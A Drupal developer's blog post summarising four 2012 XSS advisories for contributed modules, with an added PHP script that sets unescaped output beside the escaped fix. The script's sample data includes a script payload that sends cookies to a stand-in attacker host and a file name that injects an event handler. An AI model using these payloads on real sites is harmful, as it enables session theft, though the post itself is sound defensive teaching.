Parasolx

Professional in Drupal web development, theme designing, consultation and training

Security Update: Drupal Contrib Advisories 2012-142 to 145

21 Sep 2012 - 09:05 am

Spambot - Cross Site Scripting (XSS)

The Spambot module enables you to protect new user registrations from spammers using the database at stopforumspam.com.

Spambot doesn't sufficiently sanitize API responses from stopforumspam.com when they are logged to the watchdog, allowing a potential XSS attack: the stored log entry is rendered as HTML when an administrator views the recent log messages report.

This vulnerability is mitigated by the fact that only stopforumspam.com (or someone pretending to be stopforumspam.com) can exploit it.

PRH Search - Cross Site Scripting (XSS)

PRH Search provides an interface to search for information on Finnish associations using the PRH (Patentti- ja Rekisterihallitus, the Finnish Patent and Registration Office) database. The module fails to sanitize data retrieved from an untrusted third-party source, thereby exposing an arbitrary script injection vulnerability (XSS).

This vulnerability is mitigated by the fact that an attacker must either have gained access to that third-party source or use techniques such as DNS spoofing in order to inject malicious data.

Fonecta verify - Cross Site Scripting (XSS)

Fonecta verify provides an interface to retrieve information from the Finnish Fonecta company information database. The module contains an arbitrary script injection vulnerability (XSS) because it fails to sanitize data retrieved from an untrusted third-party source.

This vulnerability is mitigated by the fact that an attacker must either have gained access to that third-party source or use techniques such as DNS spoofing in order to inject malicious data.

Imagemenu - Cross Site Scripting (XSS)

The Imagemenu module allows you to create Drupal menus from image files.

The module doesn't sufficiently escape image file names when rendering menus, allowing a potential XSS attack.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer imagemenu".
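All four advisories share one root cause: text that the site does not control (an HTTP response from a third party, a file name) is placed into HTML without escaping. The script below is an added example written for this post, not code from the Spambot, PRH Search, Fonecta verify or Imagemenu modules. It shows the vulnerable and the fixed form of both patterns: an API response dropped into a watchdog message, and a file name dropped into menu markup. It assumes Drupal 7's check_plain() and format_string() helpers; reduced copies of both are defined inside the script so it runs outside Drupal, and the API response and file name are constructed samples, not real data from any of the services named above.

```php
<?php
// Added example (not code from the Spambot, PRH Search, Fonecta verify or
// Imagemenu modules). Demonstrates the pattern behind the four advisories:
// untrusted text (a third-party HTTP response, a file name) is put into HTML
// (the watchdog log viewer, a rendered menu) without escaping.
//
// Assumption: outside Drupal, check_plain() and format_string() are defined
// below as reduced copies of the Drupal 7 helpers so the script runs
// standalone; inside Drupal the real functions are used instead.

if (!function_exists('check_plain')) {
  // Drupal 7's check_plain(): escape &, <, >, " and ' for use in HTML.
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

if (!function_exists('format_string')) {
  // Reduced copy of Drupal 7's format_string(): '@var' is escaped with
  // check_plain(), '%var' is escaped and wrapped in <em>, '!var' is inserted
  // raw. t() and watchdog() messages go through the same placeholder rules.
  function format_string($string, array $args = array()) {
    foreach ($args as $key => $value) {
      switch ($key[0]) {
        case '@':
          $args[$key] = check_plain($value);
          break;
        case '%':
          $args[$key] = '<em class="placeholder">' . check_plain($value) . '</em>';
          break;
        // '!' and anything else: no escaping.
      }
    }
    return strtr($string, $args);
  }
}

// Constructed sample: what a spoofed stopforumspam.com (or a DNS-spoofed
// stand-in for the PRH or Fonecta service) could return to the module.
$untrusted_body = '<response success="0"><error>Rate limited</error></response>'
  . '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: the raw body is inserted with a '!' placeholder (concatenating
// it into the message string has the same effect). The log report renders the
// message as HTML, so the script runs in the browser of the administrator
// viewing Reports > Recent log messages.
function log_message_unsafe($body) {
  return format_string('API error: !body', array('!body' => $body));
}

// FIXED: an '@' placeholder makes format_string()/t()/watchdog() run
// check_plain() on the value before it is inserted into the message.
function log_message_safe($body) {
  return format_string('API error: @body', array('@body' => $body));
}

// Constructed sample file name of the kind someone holding the
// "administer imagemenu" permission could give an image.
$filename = 'home" onmouseover="alert(document.cookie)" x="';

// VULNERABLE: the raw name lands inside two attribute values, so the quote
// in the name closes the attribute and the rest becomes a new event handler.
function render_menu_item_unsafe($name) {
  return '<img src="/files/' . $name . '" alt="' . $name . '" />';
}

// FIXED: escape for the context the name is used in. rawurlencode() is this
// example's choice for the path segment; check_plain() for the attribute text.
function render_menu_item_safe($name) {
  return '<img src="/files/' . rawurlencode($name) . '" alt="' . check_plain($name) . '" />';
}

echo "Unsafe log message:\n", log_message_unsafe($untrusted_body), "\n\n";
echo "Safe log message:\n", log_message_safe($untrusted_body), "\n\n";
echo "Unsafe menu item:\n", render_menu_item_unsafe($filename), "\n\n";
echo "Safe menu item:\n", render_menu_item_safe($filename), "\n";
```

Running the script with `php` prints the four renderings; in the escaped versions the `<script>` tag and the quote characters appear as `&lt;script&gt;` and `&quot;` rather than as live markup. The rule all four advisories come down to is that data you do not control goes into watchdog(), t() or any rendered string only through an `@` or `%` placeholder, never by concatenation or a `!` placeholder, and file names get the same treatment before they are written into attributes.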

Tags: security fix